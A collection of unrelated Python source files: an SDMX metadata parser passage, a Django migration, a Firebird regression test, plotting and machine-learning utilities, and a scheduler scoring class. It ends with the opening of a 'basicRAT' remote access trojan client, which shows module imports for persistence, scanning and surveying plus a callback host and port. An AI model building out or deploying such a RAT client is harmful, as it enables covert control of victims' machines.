            elif e == ME_LIST:
                errors.append({'Code': 'MX02', 'ErrorLevel': 'CRITICAL',
                               'ObjectID': f'{dsd_id}', 'ObjectType': 'DSD',
                               'Message': f'DSD {dsd_id} does not have '
                                          f'a Primary Measure'})
    del json_comps[DSD_COMPS]
    return json_comps
def create_datastructures(json_dsds):
    """Create DataStructureDefinition objects from parsed DSD JSON.

    :param json_dsds: parsed JSON dict holding the DataStructures node
    :return: dict of DataStructureDefinition keyed by unique id
        (``agency:id(version)``); MS01/MS06 problems are appended to the
        module-level ``errors`` list rather than raised.
    """
    elements = {}
    if json_dsds is not None and DSD in json_dsds:
        json_dsds[DSD] = add_list(json_dsds[DSD])
        for element in json_dsds[DSD]:
            # Per-DSD scratch registries consumed by the component formatters.
            dimensions.clear()
            measures.clear()
            groups.clear()
            element = format_annotations(element)
            element = format_name_description(element)
            full_id = unique_id(element[AGENCY_ID],
                                element[ID],
                                element[VERSION])
            # dsd_id is read by nested formatters for error reporting.
            global dsd_id
            dsd_id = full_id
            element = format_urls(element)
            element = format_maintainer(element)
            element = format_id(element)
            if XMLNS in element:
                del element[XMLNS]
            if DSD_COMPS in element:
                element = format_dsd_comps(element)
            del dsd_id
            # Creation of DSD
            if full_id not in elements:
                elements[full_id] = DataStructureDefinition(**element)
            else:
                errors.append({'Code': 'MS06', 'ErrorLevel': 'CRITICAL',
                               'ObjectID': f'{full_id}', 'ObjectType': 'DSD',
                               'Message': f'DSD {full_id} is not unique'})
    else:
        errors.append(
            {'Code': 'MS01', 'ErrorLevel': 'CRITICAL',
             'ObjectID': None,
             'ObjectType': 'DSD',
             'Message': 'Not found any DSD in this file'})
    return elements
def create_dataflows(json_dfs):
    """Create DataFlowDefinition objects from parsed dataflow JSON.

    :param json_dfs: parsed JSON dict holding the Dataflows node
    :return: dict of DataFlowDefinition keyed by unique id
    :raises Exception: if the same dataflow unique id appears twice
    """
    elements = {}
    if DF in json_dfs:
        json_dfs[DF] = add_list(json_dfs[DF])
        for element in json_dfs[DF]:
            if XMLNS in element:
                del element[XMLNS]
            element = format_annotations(element)
            element = format_name_description(element)
            if STRUCTURE in element:
                # Resolve the referenced DSD if it was parsed earlier.
                agency_id = element[STRUCTURE][REF][AGENCY_ID]
                id_ = element[STRUCTURE][REF][ID]
                version = element[STRUCTURE][REF][VERSION]
                str_id = unique_id(agency_id, id_, version)
                if str_id in datastructures:
                    element[STRUCTURE.lower()] = datastructures[str_id]
                del element[STRUCTURE]
            full_id = unique_id(element[AGENCY_ID],
                                element[ID],
                                element[VERSION])
            element = format_urls(element)
            element = format_maintainer(element)
            element = format_id(element)
            # Creation of Dataflow
            if full_id not in elements:
                elements[full_id] = DataFlowDefinition(**element)
            else:
                # Fix: the original raised a bare ``Exception`` with no
                # message, hiding which dataflow was duplicated.
                raise Exception(f'DataFlow {full_id} is not unique')
    return elements
def format_key_set(json_key_set):
    """Flatten a KeyValue list into an ``{id: value}`` mapping."""
    # Normalise a single KeyValue dict to a one-element list in place.
    json_key_set[KEY_VALUE] = add_list(json_key_set[KEY_VALUE])
    return {entry[ID]: entry[VALUE] for entry in json_key_set[KEY_VALUE]}
def format_restrictions(json_cons) -> dict:
    """Reshape DataKeySet and CubeRegion nodes of a content constraint.

    Converts the raw JSON nodes into DataKeySet / CubeRegion model objects
    stored under the keys the ContentConstraint constructor expects.
    """
    if DATA_KEY_SET in json_cons:
        json_cons[DATA_KEY_SET] = add_list(json_cons[DATA_KEY_SET])
        json_cons[DATA_KEY_SET_LOW] = []
        for element in json_cons[DATA_KEY_SET]:
            # Each Key becomes one {component_id: value} mapping.
            list_keys = []
            element[KEY] = add_list(element[KEY])
            for e in element[KEY]:
                list_keys.append(format_key_set(e))
            json_cons[DATA_KEY_SET_LOW].append(DataKeySet(keys=list_keys,
                                                          isIncluded=element[
                                                              INCLUDED]))
        del json_cons[DATA_KEY_SET]
    if CUBE_REGION in json_cons:
        json_cons[CUBE_REGION] = add_list(json_cons[CUBE_REGION])
        cubes = []
        for element in json_cons[CUBE_REGION]:
            is_included = element[INCLUDE]
            keys = format_key_set(element)
            # One MemberSelection per restricted component id.
            members = []
            for e in keys:
                members.append(MemberSelection(is_included,
                                               values_for=e,
                                               sel_value=keys[e]))
            cubes.append(CubeRegion(is_included=is_included, member=members))
        json_cons[CONTENT_REGION] = cubes
        del json_cons[CUBE_REGION]
    return json_cons
def create_constraints(json_cons):
    """Create ContentConstraint objects from parsed constraint JSON.

    Resolves the constraint attachment (a DSD or a dataflow parsed
    earlier) and attaches the constraint to it when found.

    :param json_cons: parsed JSON dict holding the ContentConstraints node
    :return: dict of ContentConstraint keyed by unique id
    :raises Exception: if the same constraint unique id appears twice
    """
    elements = {}
    if CON_CONS in json_cons:
        json_cons[CON_CONS] = add_list(json_cons[CON_CONS])
        for element in json_cons[CON_CONS]:
            attachment = None
            references = []
            if XMLNS in element:
                del element[XMLNS]
            element = format_annotations(element)
            element = format_name_description(element)
            full_id = unique_id(element[AGENCY_ID],
                                element[ID],
                                element[VERSION])
            element = format_urls(element)
            element = format_maintainer(element)
            element = format_id(element)
            if CONS_ATT in element:
                # Attachment may reference either a DSD or a dataflow.
                if DSD in element[CONS_ATT]:
                    agency_id = element[CONS_ATT][DSD][REF][AGENCY_ID]
                    id_ = element[CONS_ATT][DSD][REF][ID]
                    version = element[CONS_ATT][DSD][REF][VERSION]
                    str_id = unique_id(agency_id, id_, version)
                    references = [str_id, DSD]
                    if str_id in datastructures:
                        attachment = datastructures[str_id]
                elif DF in element[CONS_ATT]:
                    agency_id = element[CONS_ATT][DF][REF][AGENCY_ID]
                    id_ = element[CONS_ATT][DF][REF][ID]
                    version = element[CONS_ATT][DF][REF][VERSION]
                    str_id = unique_id(agency_id, id_, version)
                    references = [str_id, DF]
                    if str_id in dataflows:
                        attachment = dataflows[str_id]
                del element[CONS_ATT]
            if TYPE in element:
                element[ROLE.lower()] = element.pop(TYPE)
            element = format_restrictions(element)
            # Creation of Constraint
            if full_id not in elements:
                elements[full_id] = ContentConstraint(**element)
            else:
                # Fix: the original raised a bare ``Exception`` with no
                # message, hiding which constraint was duplicated.
                raise Exception(f'Constraint {full_id} is not unique')
            if attachment is not None:
                attachment.add_constraint(elements[full_id])
            del attachment
            # TODO Delete once we change constraints
            if len(references) > 0:
                elements[full_id]._ref_attach = references[0]
                elements[full_id]._type_attach = references[1]
    return elements
def grouping_errors():
    """Flush the ``missing_rep`` registries into the ``errors`` list.

    Fix: the original repeated the same append-and-clear block three
    times (CS/CL/CON); the mapping below drives a single loop instead.
    Emission order (CS, then CL, then CON) and all message texts are
    unchanged.
    """
    # key in missing_rep -> (error code, object type, message prefix)
    missing_rep_errors = {
        "CS": ('MS07', 'Concept', 'Missing Concept Scheme'),
        "CL": ('MS02', 'Codelist', 'Missing Codelist'),
        "CON": ('MS03', 'Concept', 'Missing Concept'),
    }
    for key, (code, obj_type, msg) in missing_rep_errors.items():
        for e in missing_rep[key]:
            errors.append({'Code': code, 'ErrorLevel': 'CRITICAL',
                           'ObjectID': f'{e}',
                           'ObjectType': obj_type,
                           'Message': f'{msg} {e}'})
        missing_rep[key].clear()
def create_metadata(json_meta):
    """
    Metadata validations stands for the next schema:

    .. list-table:: Metadata validations
        :widths: 20 80
        :header-rows: 1

        * - Code
          - Description
        * - MS01
          - Check that the metadata file contains at least one DSD
        * - MS02
          - Check that the metadata file contains related codelists
        * - MS03
          - Check if the DSD metadata file contains the concepts needed \
            for each DSD
        * - MS04
          - Check if the dimensions in Attribute Relationship are in \
            DimensionList in DSD file
        * - MS05
          - Check if the primary measure in Attribute Relationship is in
            MeasureList in DSD file
        * - MS06
          - Check if all DSDs present in the metadata file are unique
        * - MS07
          - Check if all Concept Scheme needed are present
        * - MX01
          - Check if minimum structural requirements for DSD xml are \
            satisfied
        * - MX02
          - Check if every DSD has primary measure defined
    """
    # Reset dict to store metadata
    metadata = dict()
    if ORGS in json_meta:
        metadata[ORGS] = create_organisations(json_meta[ORGS])
    if CODELISTS in json_meta:
        metadata[CODELISTS] = create_scheme(json_meta[CODELISTS], CL, CODE)
        codelists.update(metadata[CODELISTS])
    if CONCEPTS in json_meta:
        metadata[CONCEPTS] = create_scheme(json_meta[CONCEPTS], CS, CON)
        concepts.update(metadata[CONCEPTS])
    if DSDS in json_meta:
        # DSD parsing consumes the codelists/concepts registered above.
        metadata[DSDS] = create_datastructures(json_meta[DSDS])
        datastructures.update(metadata[DSDS])
    if DATAFLOWS in json_meta:
        metadata[DATAFLOWS] = create_dataflows(json_meta[DATAFLOWS])
        dataflows.update(metadata[DATAFLOWS])
    if CONSTRAINTS in json_meta:
        metadata[CONSTRAINTS] = create_constraints(json_meta[CONSTRAINTS])
    # Flush any missing-representation errors collected while parsing.
    grouping_errors()
    # Snapshot errors before the registries are cleared below.
    metadata['errors'] = copy.copy(errors)
    # Reset global variables
    agencies.clear()
    concepts.clear()
    codelists.clear()
    datastructures.clear()
    dataflows.clear()
    errors.clear()
    return metadata
|
# Generated by Django 3.2.6 on 2021-10-09 00:15
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a lifecycle ``state`` field to the VirtualMachine model.

    Auto-generated by Django 3.2.6; avoid hand-editing the operations.
    """

    dependencies = [
        ('vmmanager', '0008_auto_20211008_0224'),
    ]

    operations = [
        migrations.AddField(
            model_name='virtualmachine',
            name='state',
            # The default matches the first lifecycle choice ('CREATING').
            field=models.CharField(choices=[('CREATING', 'Creating'), ('AVAILABLE', 'Available'), ('TERMINATING', 'Terminating'), ('TERMINATED', 'Terminated'), ('ERROR', 'Error')], default='CREATING', max_length=16),
        ),
    ]
|
#coding:utf-8
#
# id: bugs.core_5367
# title: Regression: (boolean) parameters as search condition no longer allowed
# decription:
# Confirmed on WI-T4.0.0.397 before commit 04-oct-2016 17:52
# https://github.com/FirebirdSQL/firebird/commit/8a4b7e3b79a31dc7bf6e569e6cf673cf6899a475
# - got:
# Statement failed, SQLSTATE = 22000
# Dynamic SQL Error
# -SQL error code = -104
# -Invalid usage of boolean expression
#
# Works fine since that commit (checked on LI-T4.0.0.397).
#
# tracker_id: CORE-5367
# min_versions: ['3.0.2']
# versions: 3.0.2
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0.2
# resources: None
# isql output substitutions applied before comparison (none needed here).
substitutions_1 = []

init_script_1 = """
recreate table test(id int,boo boolean);
"""

db_1 = db_factory(sql_dialect=3, init=init_script_1)

# 'set planonly' is toggled on before the statement and off after it, so
# only the plan and the sqlda description are printed, never data rows.
test_script_1 = """
set sqlda_display on;
set planonly;
select * from test where ?;
set planonly;
"""

act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)

# Expected sqlda: the lone '?' parameter must be described as BOOLEAN
# (regression check for CORE-5367).
expected_stdout_1 = """
INPUT message field count: 1
01: sqltype: 32764 BOOLEAN scale: 0 subtype: 0 len: 1
: name: alias:
: table: owner:
PLAN (TEST NATURAL)
OUTPUT message field count: 2
01: sqltype: 496 LONG Nullable scale: 0 subtype: 0 len: 4
: name: ID alias: ID
: table: TEST owner: SYSDBA
02: sqltype: 32764 BOOLEAN Nullable scale: 0 subtype: 0 len: 1
: name: BOO alias: BOO
: table: TEST owner: SYSDBA
"""
@pytest.mark.version('>=3.0.2')
def test_1(act_1: Action):
    """CORE-5367: a lone '?' parameter must be accepted as a boolean
    search condition and described as BOOLEAN in the sqlda output."""
    act_1.expected_stdout = expected_stdout_1
    act_1.execute()
    assert act_1.clean_stdout == act_1.clean_expected_stdout
|
from action_detector_diagnosis import ActionDetectorDiagnosis
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
import numpy as np
import pandas as pd
import os
from collections import OrderedDict
from matplotlib import gridspec, rc
import matplotlib as mpl
import matplotlib.font_manager
# Select the non-interactive Agg backend before pyplot is imported below.
mpl.use('Agg')

# Paper-style defaults: LaTeX-rendered serif (Times) text, heavier ticks.
params = {'font.family': 'serif','font.serif': 'Times',
          'text.usetex': True,
          'xtick.major.size': 8,
          'ytick.major.size': 8,
          'xtick.major.width': 3,
          'ytick.major.width': 3,
          'mathtext.fontset': 'custom',
          }
mpl.rcParams.update(params)
import matplotlib.pyplot as plt
def split_predictions_by_score_ranges(fp_error_analysis, groups):
    """Bucket predictions by score rank per class and count FP error types.

    For each class with n_j ground-truth instances, the highest-scoring
    n_j predictions go into bucket 0, the next n_j into bucket 1, etc.,
    up to ``groups`` buckets.

    :return: (filtered_prediction, fp_error_types_count_df,
              fp_error_types_precentage_df), each a dict keyed by bucket.
    """
    ground_truth = fp_error_analysis.ground_truth
    prediction = fp_error_analysis.prediction

    ground_truth_gbvn = ground_truth.groupby('label')
    # Rank predictions by confidence so bucket g holds the (g+1)-th slab.
    prediction = prediction.sort_values(by='score', ascending=False).reset_index(drop=True)
    prediction_gbvn = prediction.groupby('label')

    filtered_prediction_df_list = {}
    for g in range(groups):
        filtered_prediction_df_list[g] = []

    for label, this_ground_truth in ground_truth_gbvn:
        try:
            # Check if there is at least one prediction for this class.
            this_prediction = prediction_gbvn.get_group(label).reset_index(drop=True)
        except Exception as e:
            print('label %s is missing from prediciton' % label)
            continue
        index = 0
        n_j = len(np.unique(this_ground_truth['gt-id']))
        max_index = len(this_prediction)
        for g in range(groups):
            # pick the top (len(this_ground_truth)*self.limit_factor) predictions
            filtered_prediction_df_list[g] += [this_prediction.iloc[index:min(index+n_j,max_index)]]
            index += n_j
            if (index >= max_index):
                # NOTE(review): 'continue' keeps appending empty slices for
                # the remaining buckets; harmless, but 'break' would be
                # clearer — confirm before changing.
                continue

    filtered_prediction = {}
    fp_error_types_count = {}
    fp_error_types_count_df = {}
    fp_error_types_precentage_df = {}
    # Error-type id -> name mapping used by the per-prediction columns.
    fp_error_types_legned = {'True Positive': 0,
                             'Double Detection Err': 1,
                             'Wrong Label Err': 2,
                             'Localization Err': 3,
                             'Confusion Err': 4,
                             'Background Err': 5}
    fp_error_types_inverse_legned = dict([(v, k) for k, v in fp_error_types_legned.items()])

    for g in range(groups):
        filtered_prediction[g] = pd.concat(filtered_prediction_df_list[g], ignore_index=True)
        for col_name, tiou in zip(fp_error_analysis.fp_error_type_cols, fp_error_analysis.tiou_thresholds):
            # Initialise all error types to 0, then overwrite observed ones.
            fp_error_types_count[tiou] = dict(zip(fp_error_types_legned.keys(), [0]*len(fp_error_types_legned)))
            error_ids, counts = np.unique(filtered_prediction[g][col_name], return_counts=True)
            for error_id,count in zip(error_ids, counts):
                fp_error_types_count[tiou][fp_error_types_inverse_legned[error_id]] = count
        fp_error_types_count_df[g] = pd.DataFrame(fp_error_types_count)
        fp_error_types_count_df[g]['avg'] = fp_error_types_count_df[g].mean(axis=1)
        fp_error_types_precentage_df[g] = fp_error_types_count_df[g]/len(filtered_prediction[g])

    return filtered_prediction, fp_error_types_count_df, fp_error_types_precentage_df
def subplot_fp_profile(fig, ax, values, labels, colors, xticks, xlabel, ylabel, title,
                       fontsize=14, bottom=0, top=100, bar_width=1, spacing=0.85,
                       grid_color='gray', grid_linestyle=':', grid_lw=1,
                       ncol=1, legend_loc='best'):
    """Draw a stacked-bar false-positive profile on ``ax``.

    Stacking is simulated by plotting cumulative sums back-to-front: the
    largest cumulative bar is drawn first and each shorter one overlays it.

    :return: the legend artist (needed for bbox_extra_artists at save time)
    """
    ax.yaxis.grid(color=grid_color, linestyle=grid_linestyle, lw=grid_lw)

    # Fractions -> percentages, then cumulative sum across error types.
    cumsum_values = np.cumsum(np.array(values)*100, axis=1)
    index = np.linspace(0, spacing*bar_width*len(values),len(values))
    # Reverse order so shorter cumulative bars are painted on top.
    for i in range(cumsum_values.shape[1])[::-1]:
        rects1 = ax.bar(index, cumsum_values[:,i], bar_width,
                        capsize = i,
                        color=colors[i],
                        label=xticks[i], zorder=0)

    lgd = ax.legend(loc=legend_loc, ncol=ncol, fontsize=fontsize/1.2, edgecolor='k')
    ax.set_ylabel(ylabel, fontsize=fontsize)
    ax.set_xlabel(xlabel, fontsize=fontsize)
    plt.setp(ax.get_yticklabels(), fontsize=fontsize/1.2)
    plt.xticks(np.array(index), np.array(labels[:len(values)]), fontsize=fontsize/1.2, rotation=90)
    plt.yticks(np.linspace(0,1,11)*100, fontsize=fontsize/1.2 )
    ax.set_ylim(bottom=bottom, top=top)
    ax.set_xlim(left=index[0]-1.25*bar_width, right=index[-1]+1.0*bar_width)
    ax.set_title(title, fontsize=fontsize)
    # Cosmetic axis styling: hide top/right spines, thicken bottom/left.
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    ax.yaxis.grid(True, linestyle='dotted')
    ax.set_axisbelow(True)
    ax.yaxis.set_tick_params(size=10, direction='in', width=2)
    for axis in ['bottom','left']:
        ax.spines[axis].set_linewidth(2.5)
    return lgd
def subplot_error_type_impact(fig, ax, values, labels, colors, xlabel, ylabel, title,
                              fontsize=14, bottom=0, top=100, bar_width=1, spacing=1.1,
                              grid_color='gray', grid_linestyle=':', grid_lw=1):
    """Draw a grouped bar chart of per-error-type mAP improvement on ``ax``.

    Each bar is annotated with its height (in percent) above the bar.
    """
    ax.yaxis.grid(color=grid_color, linestyle=grid_linestyle, lw=grid_lw)

    # Single anchor position; bars are offset from it by i*spacing*bar_width.
    index = np.linspace(0, spacing*(len(values)+1),1)
    for i in range(len(values)):
        rects1 = ax.bar(index + i*spacing*bar_width, values[i]*100, bar_width,
                        capsize = i,
                        color=colors[i],
                        label=labels[i])
        for bari in rects1:
            # Label each bar with its percentage value.
            height = bari.get_height()
            plt.gca().text(bari.get_x() + bari.get_width()/2, bari.get_height()+0.001*100, '%.1f' % height,
                           ha='center', color='black', fontsize=fontsize/1.1)

    ax.set_ylabel(ylabel, fontsize=fontsize)
    ax.set_xlabel(xlabel, fontsize=fontsize)
    plt.xticks([])
    plt.yticks(fontsize=fontsize/1.2)
    ax.set_ylim(bottom=bottom,top=top)
    ax.set_title(title, fontsize=fontsize)
    # Cosmetic axis styling: hide top/right spines, thicken bottom/left.
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    ax.yaxis.grid(True, linestyle='dotted')
    ax.set_axisbelow(True)
    ax.yaxis.set_tick_params(size=10, direction='in', width=2)
    for axis in ['bottom','left']:
        ax.spines[axis].set_linewidth(2.5)
def plot_fp_analysis(fp_error_analysis, save_filename,
                     colors=['#33a02c','#b2df8a','#1f78b4','#fb9a99','#e31a1c','#a6cee3'],
                     error_names=['True Positive', 'Double Detection Err','Wrong Label Err', 'Localization Err', 'Confusion Err', 'Background Err'],
                     figsize=(10,4.42), fontsize=24):
    """Render the two-panel FP analysis figure and save it to disk.

    Left panel: stacked error breakdown per top-prediction bucket.
    Right panel: average-mAP gain from removing each error type.

    NOTE(review): colors/error_names are mutable default arguments; safe
    here because they are only read, but flagged for awareness.
    """
    values,labels = [],[]
    _, _, fp_error_types_precentage_df = split_predictions_by_score_ranges(fp_error_analysis,fp_error_analysis.limit_factor)
    for this_limit_factor, this_fp_error_types_precentage_df in fp_error_types_precentage_df.items():
        # One row of percentages per bucket, ordered like error_names.
        values+=[[this_fp_error_types_precentage_df['avg'][k] for k in error_names]]
        labels+=['$%dG$' % (this_limit_factor+1)]

    fig = plt.figure(figsize=figsize)
    # 5-column grid: first 3 columns for the profile, last 2 for the impact.
    grid = plt.GridSpec(1, 5, wspace=1.75, right=1.00)
    lgd = subplot_fp_profile(fig=fig, ax=fig.add_subplot(grid[:-2]),
                             values=values, labels=labels, colors=colors,
                             xticks=error_names,
                             xlabel='Top Predictions', ylabel='Error Breakdown ($\%$)',
                             title='False Positive Profile', fontsize=fontsize,
                             ncol=3, legend_loc=(-0.15,1.15))

    subplot_error_type_impact(fig=fig, ax=fig.add_subplot(grid[-2:]),
                              values=list(fp_error_analysis.average_mAP_gain.values()),
                              labels=list(fp_error_analysis.average_mAP_gain.keys()),
                              colors=colors[1:],
                              xlabel='Error Type', ylabel='Average-mAP$_N$\nImprovment $(\%)$',
                              title='Removing Error Impact', fontsize=fontsize,
                              top=np.ceil(np.max(list(fp_error_analysis.average_mAP_gain.values()))*100*1.1))

    # Pass the legend so tight bbox saving does not clip it.
    fig.savefig(save_filename, bbox_extra_artists=(lgd,), bbox_inches='tight')
    print('[Done] Output analysis is saved in %s' % save_filename)
def main(ground_truth_filename, prediction_filename, output_folder):
    """Run the false-positive diagnosis and save the analysis figure.

    :param ground_truth_filename: path to ground-truth annotation JSON
    :param prediction_filename: path to prediction JSON
    :param output_folder: directory for the output PDF (created if absent)
    """
    os.makedirs(output_folder, exist_ok=True)

    # Alternative configuration kept for reference:
    # characteristic_names_to_bins = {'context-size': (range(-1,7), ['0','1','2','3','4','5','6']),
    #                                 'context-distance': (range(-1,4), ['Inf','N','M','F']),
    #                                 'agreement': (np.linspace(0,1.0,6), ['XW','W','M','H','XH']),
    #                                 'coverage': (np.linspace(0,1.0,6), ['XS','S','M','L','XL']),
    #                                 'length': (np.array([0,30,60,120,180,np.inf]), ['XS','S','M','L','XL']),
    #                                 'num-instances': (np.array([-1,1,4,8,np.inf]), ['XS','S','M','L'])}
    # tiou_thresholds = np.linspace(0.5, 0.95, 10)
    fp_error_analysis = ActionDetectorDiagnosis(ground_truth_filename=ground_truth_filename,
                                                prediction_filename=prediction_filename,
                                                tiou_thresholds=[0.5],
                                                limit_factor=10,
                                                min_tiou_thr=0.1,
                                                verbose=True,
                                                load_extra_annotations=False,
                                                characteristic_names_to_bins={},
                                                normalize_ap=False,
                                                minimum_normalized_precision_threshold_for_detection=0.0
                                                )
    # evaluate() computes detection metrics; diagnose() classifies FP errors.
    fp_error_analysis.evaluate()
    fp_error_analysis.diagnose()

    plot_fp_analysis(fp_error_analysis=fp_error_analysis,
                     save_filename=os.path.join(output_folder,'false_positive_analysis.pdf'))
# Command-line entry point: all three path arguments are mandatory.
if __name__ == '__main__':
    parser = ArgumentParser(description='Run the false positive error analysis.',
                            formatter_class=ArgumentDefaultsHelpFormatter)
    parser.add_argument('--ground_truth_filename', required=True, type=str,
                        help='The path to the JSON file containing the ground truth annotations')
    parser.add_argument('--prediction_filename', required=True, type=str,
                        help='The path to the JSON file containing the method\'s predictions')
    parser.add_argument('--output_folder', required=True, type=str,
                        help='The path to the folder in which the results will be saved')
    args = parser.parse_args()

    main(args.ground_truth_filename, args.prediction_filename, args.output_folder)
|
"""
===============================
Using geometric transformations
===============================
This example illustrates use of geometric transformations in the context of
image processing.
"""
import math
import numpy as np
import matplotlib.pyplot as plt
from skimage import data
from skipp import transform
######################################################################
# Basics
# ======
#
# Affine geometric transformation is supported.
#
# Geometric transformations can either be created using the explicit
# parameters (e.g. scale, shear, rotation and translation) or the
# transformation matrix.
#
# Create a transformation using explicit parameters:

tform = transform.AffineTransform(scale=1, rotation=math.pi/2,
                                  translation=(0, 1))
print(tform.params)

######################################################################
# Alternatively, define the transformation through the transformation
# matrix itself:

matrix = tform.params.copy()
matrix[1, 2] = 2
tform2 = transform.AffineTransform(matrix)

######################################################################
# Image warping
# =============
#
# Geometric transformations can also be used to warp images:

text = data.text()

tform = transform.AffineTransform(scale=1, rotation=math.pi/4,
                                  translation=(text.shape[0]/2, -100))
rotated = transform.warp(text, tform)

# Show original and warped images stacked vertically.
fig, ax = plt.subplots(nrows=2)

ax[0].imshow(text, cmap=plt.cm.gray)
ax[1].imshow(rotated, cmap=plt.cm.gray)

for a in ax:
    a.axis('off')

plt.tight_layout()
plt.show()
|
from abc import ABC, abstractmethod
from typing import List, Union

import pandas as pd
from sklearn.base import ClassifierMixin, RegressorMixin

from resultado import Resultado
class MetodoAprendizadoDeMaquina(ABC):
    """Abstract interface for a machine-learning method.

    Fix: the class now inherits from ``abc.ABC`` — without an ABC base,
    ``@abstractmethod`` is not enforced and the incomplete base class
    could be instantiated freely.
    """

    @abstractmethod
    def eval(self, df_treino: pd.DataFrame, df_data_to_predict: pd.DataFrame,
             col_classe: str) -> Resultado:
        """Train on ``df_treino`` and evaluate on ``df_data_to_predict``.

        :param df_treino: training data including the class column
        :param df_data_to_predict: data to predict, same columns
        :param col_classe: name of the target (class) column
        :return: a Resultado comparing true and predicted targets
        """
        raise NotImplementedError
class ScikitLearnAprendizadoDeMaquina(MetodoAprendizadoDeMaquina):
    """Adapter that evaluates any scikit-learn estimator.

    ``Union`` is used because ``ml_method`` may be either a
    ClassifierMixin or a RegressorMixin — the two superclasses of
    scikit-learn's classifiers and regression methods.
    """

    def __init__(self, ml_method: Union[ClassifierMixin, RegressorMixin]):
        self.ml_method = ml_method

    def eval(self, df_treino: pd.DataFrame, df_data_to_predict: pd.DataFrame,
             col_classe: str, seed: int = 1) -> Resultado:
        """Fit the estimator on the training frame and score predictions.

        :param df_treino: training data including the class column
        :param df_data_to_predict: data to predict, same columns
        :param col_classe: name of the target (class) column
        :param seed: kept for interface compatibility; not used here
        :return: Resultado comparing true and predicted targets
        """
        # Split attributes from the target: x keeps every column except
        # the class, y keeps only the class values.
        x_treino = df_treino.drop([col_classe], axis=1)
        # Fix: select the target as a 1-D Series — df[[col]] yields a 2-D
        # DataFrame, which triggers sklearn's DataConversionWarning.
        y_treino = df_treino[col_classe]

        # Fit the estimator (sklearn's fit returns the estimator itself).
        model = self.ml_method.fit(x_treino, y_treino)

        # Same attribute/target split for the data to be predicted.
        x_to_predict = df_data_to_predict.drop([col_classe], axis=1)
        y_to_predict = df_data_to_predict[col_classe].to_numpy()

        # Wrap true vs predicted values in the project's result object.
        y_predictions = model.predict(x_to_predict)
        return Resultado(y_to_predict, y_predictions)
|
# Copyright (c) 2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Dict, List, Tuple
from wca.logger import TRACE
from wca.metrics import Metric, MetricType
from wca.scheduler.algorithms.base import get_requested_fraction, DEFAULT_DIMENSIONS
from wca.scheduler.algorithms.fit import Fit
from wca.scheduler.data_providers import DataProvider
from wca.scheduler.metrics import MetricName
from wca.scheduler.types import ResourceType
log = logging.getLogger(__name__)
def calculate_variance(app_name, node_name: str, requested_fraction: Dict[ResourceType, float],
                       bar_weights: Dict[ResourceType, float]) -> \
        Tuple[float, List[Metric]]:
    """Return variance using bar_weights.

    For 3+ dimensions the value is the bar_weights-weighted mean of squared
    deviations from the mean fraction; for exactly 2 it is the absolute
    difference; for a single dimension it is 0.

    :return: (variance, metrics emitted for mean and variance)
    """
    # Mean - priority according to variance of dimensions
    metrics = []
    # Fix: sum the values view directly instead of building a throwaway
    # list comprehension (ruff PERF402/C4xx).
    mean = sum(requested_fraction.values()) / len(requested_fraction)
    log.log(TRACE, "[Prioritize][app=%s][node=%s][bar] Mean: %s", app_name, node_name, mean)
    metrics.append(
        Metric(name=MetricName.BAR_MEAN,
               value=mean, labels=dict(app=app_name, node=node_name),
               type=MetricType.GAUGE))

    # Variance
    if len(requested_fraction) > 2:
        # Missing weights default to 1 so unweighted dimensions still count.
        variance = sum(((fraction - mean) * (fraction - mean)) * bar_weights.get(rt, 1)
                       for rt, fraction in requested_fraction.items()) \
            / len(requested_fraction)
    elif len(requested_fraction) == 2:
        values = list(requested_fraction.values())
        variance = abs(values[0] - values[1])
    else:
        variance = 0

    log.log(TRACE,
            "[Prioritize][app=%s][node=%s][bar] "
            "Variance(weighted quadratic sum of requested_fraction-mean): %s",
            app_name, node_name, variance)
    metrics.append(
        Metric(name=MetricName.BAR_VARIANCE,
               value=variance, labels=dict(app=app_name, node=node_name),
               type=MetricType.GAUGE))

    return variance, metrics
class BAR(Fit):
    """Balanced-Resource-Allocation scorer.

    Prefers nodes where the app's requested resource fractions are most
    even across dimensions (lowest variance).
    """

    def __init__(self,
                 data_provider: DataProvider,
                 dimensions: List[ResourceType] = DEFAULT_DIMENSIONS,
                 bar_weights: Dict[ResourceType, float] = None,
                 alias=None,
                 max_node_score: float = 10.,
                 ):
        Fit.__init__(self, data_provider, dimensions, alias=alias, max_node_score=max_node_score)
        # Per-dimension weights for the variance term; calculate_variance
        # treats missing entries as weight 1.
        self.bar_weights = bar_weights or {}

    def priority_for_node(self, node_name, app_name, data_provider_queried) -> float:
        """ Return priority for node_name for app_name according data from data_provider.
        Priority is based on variance of fraction of requested resources.
        """
        nodes_capacities, assigned_apps, apps_spec, _ = data_provider_queried
        requested_fraction, metrics = get_requested_fraction(
            app_name, apps_spec, assigned_apps, node_name, nodes_capacities, self.dimensions)
        self.metrics.extend(metrics)

        variance, metrics = calculate_variance(
            app_name, node_name, requested_fraction, self.bar_weights)
        self.metrics.extend(metrics)

        # Lower variance -> higher score.
        bar_score = (1.0 - variance)
        log.debug("[Prioritize][app=%s][node=%s][bar] Bar score: %s", app_name, node_name,
                  bar_score)
        # NOTE(review): 'add' here vs 'extend' above — presumably the
        # metrics registry exposes add() for a single metric; confirm.
        self.metrics.add(
            Metric(name=MetricName.BAR_SCORE,
                   value=bar_score, labels=dict(app=app_name, node=node_name),
                   type=MetricType.GAUGE))
        return bar_score
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# basicRAT client
# https://github.com/vesche/basicRAT
#
import socket
import subprocess
import struct
import sys
from core import common
from core import crypto
from core import filesock
from core import persistence
from core import scan
from core import survey
from core import toolkit
# Platform identifier (e.g. 'linux', 'win32'); passed to persistence/survey.
PLAT_TYPE = sys.platform
# Callback server address.
HOST = 'localhost'
PORT = 1337
# NOTE(review): FB_KEY is not referenced in this file — presumably a
# fallback key consumed elsewhere (the session key comes from DH); confirm.
